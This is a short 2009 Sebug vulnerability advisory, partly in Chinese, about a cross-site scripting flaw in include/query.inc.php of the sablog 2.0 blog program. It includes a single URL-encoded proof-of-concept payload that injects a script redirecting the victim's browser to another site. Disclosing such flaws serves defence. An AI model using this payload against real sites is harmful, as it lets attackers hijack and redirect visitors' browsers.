sablog 2.0
sablog2.0 query.inc.php 跨站漏洞
SEBUG-ID:4965
SEBUG-Appdir:sablog
Published:2009-04-01
author:kiki (kikize_at_163.com)
Vulnerable:
Discription:
sablog是国内安全研究人员写的一款blog程序。由于过滤不严,存在多个跨站漏洞. http://www.sablog.net/blog/ ./include/query.inc.php 问题出在经常被人忽视的超全局变量上,过于相信超全局变量了
<*References
sebug.net*>
Exploit:
[www.sebug.net]
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
/include/query.inc.php/%3Cscript%3Etop.location.href%3D%27http%3A%2F%27%2B%27%2Fwww.sebug.net%2Findex.php%27%3B%3C%2Fscript%3E
SEBUG Solution:
// sebug.net [2009-04-01]